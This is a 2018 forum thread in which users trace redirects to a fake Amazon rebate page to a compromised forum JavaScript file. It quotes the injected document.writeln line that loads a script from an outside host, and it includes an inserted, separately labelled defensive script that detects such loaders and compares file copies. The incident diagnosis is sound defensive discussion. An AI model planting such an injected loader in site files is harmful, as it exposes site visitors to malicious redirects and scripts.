Amazon redirect at Larian? #650502
18/10/18 12:49 AM
Joined: Nov 2016
Posts: 334
Eastern Washington state, USA
caninelegion Online puppyeyes OP
Bugfinder General
I keep getting redirected to a site claiming I won some sort of Amazon rebate - only happens when I click on a thread within the forum. Is this by design or have we been hacked?

Re: Amazon redirect at Larian? [Re: caninelegion] #650515
18/10/18 05:29 PM
Joined: Sep 2016
Posts: 20
DuchessOfKvetch Offline
stranger
I got this too! Another user in one of the support forums thinks it might be an infected image, since this forum lets people link to any url for their profile avatar, which seems like a really bad idea.

For the record, I am using Chrome.

Time to clear the browser cache at least.

Last edited by DuchessOfKvetch; 18/10/18 05:43 PM.
Re: Amazon redirect at Larian? [Re: caninelegion] #650536
19/10/18 12:09 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
There seems to be a dodgy-looking script linking to qqtx.me: I don't know its provenance and after I flagged it, it's being "looked into" but personally I would (and have) nuke it with NoScript or similar.


I like cheese.
Re: Amazon redirect at Larian? [Re: caninelegion] #650543
19/10/18 05:29 PM
Joined: Sep 2016
Posts: 20
DuchessOfKvetch Offline
stranger
This is happening again today, even though it was cleaned up yesterday afternoon. Could be a compromised login account posting injected script to a forum post? Or using it in their avatar url?

There is a newer version of UBB btw (7.6), they keep patching more XSS vulnerabilities!

Re: Amazon redirect at Larian? [Re: caninelegion] #650544
19/10/18 06:43 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
I'm afraid I'm as in the dark as you are; I only have the most basic admin access to get rid of problem users, but it seems one of the javascript files was modified at some point recently. Still waiting on an update as to what's behind it. But without knowing its history it could be a red herring.


I like cheese.
Re: Amazon redirect at Larian? [Re: caninelegion] #650570
20/10/18 04:48 PM
Joined: Sep 2016
Posts: 20
DuchessOfKvetch Offline
stranger
Can you at least update the site's js files? Because you don't have any security on your static files, they're easily viewable to the public (true enough for a lot of sites' js files, but generally opens one up even more to hackers).

So I can see a line that shouldn't be there in http://larian.com/forums/ubb_js/quickquote.js?v=7.5.8, midway down:

document.writeln("***** src=\'//om.qqtx.me/jquery.jscroll.min.js\'></*****>");
(script tags scrubbed for safety)

Now, how someone has modified this file is another story, as there could be a MITM attack going on, especially if the local server's copy is clean, but the one we're downloading as clients is NOT. If you restore with the original UBB script file, does the issue come back?
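
The check described in the post above, as an added example that is not part of the original thread or of UBB's code: it flags `document.write`/`writeln` calls that emit a script tag from a host outside an allowlist, then compares a vendor copy, the on-disk copy and the served copy to narrow down where the file was changed. The file contents, host names and function names are constructed for illustration.

```javascript
// Hosts this site is expected to load scripts from (assumed for the example).
const ALLOWED_HOSTS = new Set(['forum.example.invalid']);

// Flag document.write/writeln calls that emit a <script src=...> tag whose
// host is not allowlisted. Relative src values are same-origin and skipped.
function findInjectedLoaders(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  source.split(/\r?\n/).forEach((line, i) => {
    if (!/document\.write(?:ln)?\s*\(/.test(line)) return;
    const tag = /<script\b[^>]*?\bsrc\s*=\s*\\?["']([^"'\\]+)/i.exec(line);
    if (!tag) return;
    const host = /^(?:https?:)?\/\/([^\/:?#]+)/i.exec(tag[1]);
    if (host && !allowedHosts.has(host[1].toLowerCase())) {
      findings.push({ line: i + 1, src: tag[1], host: host[1].toLowerCase() });
    }
  });
  return findings;
}

// Non-empty lines present in `suspect` but absent from the known-good copy.
function addedLines(knownGood, suspect) {
  const baseline = new Set(knownGood.split(/\r?\n/).map((l) => l.trim()));
  return suspect.split(/\r?\n/)
    .map((text, i) => ({ line: i + 1, text: text.trim() }))
    .filter((l) => l.text !== '' && !baseline.has(l.text));
}

// Compare vendor original, file on the server's disk, and bytes a client got.
function triage(vendor, onDisk, served) {
  if (addedLines(vendor, onDisk).length > 0) return 'modified-on-server';
  if (addedLines(vendor, served).length > 0) return 'modified-after-leaving-disk';
  return 'clean';
}

// Constructed sample data: a tiny stand-in for a vendor file and a tampered copy.
const VENDOR = [
  'function quickQuote(id) {',
  '  return document.getElementById("quote-" + id);',
  '}',
].join('\n');
const TAMPERED = [
  'function quickQuote(id) {',
  String.raw`document.writeln("<script src=\'//static.example.invalid/lib.min.js\'></script>");`,
  '  return document.getElementById("quote-" + id);',
  '}',
].join('\n');

console.log(findInjectedLoaders(TAMPERED));
console.log(triage(VENDOR, VENDOR, TAMPERED));
```

A `modified-after-leaving-disk` result points at a cache, proxy or the network path rather than the file on the server itself.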

Re: Amazon redirect at Larian? [Re: caninelegion] #650571
20/10/18 07:54 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
I'm afraid I can't: I only have access to the bit of the CP that deals with user accounts and no access at all to the server itself, frustratingly. I am concerned about the integrity of the server but I have no means of ascertaining the current situation but it does seem that multiple js files are affected. Speaking personally I would've shut down the whole thing until I figured out the source of the problem but that's beyond my control.


I like cheese.
Re: Amazon redirect at Larian? [Re: vometia] #650619
23/10/18 07:04 PM
Joined: Nov 2016
Posts: 334
Eastern Washington state, USA
caninelegion Online puppyeyes OP
Bugfinder General
RE: "I would've shut down the whole thing until I figured out the source of the problem"

Looks like they heard you :)

Re: Amazon redirect at Larian? [Re: caninelegion] #650625
23/10/18 10:03 PM
Joined: May 2010
Posts: 2,977
The Frog & Hounds
vometia Offline

veteran
I can be quite annoying when required. :D


I like cheese.

Powered by UBB.threads™ PHP Forum Software 7.6.2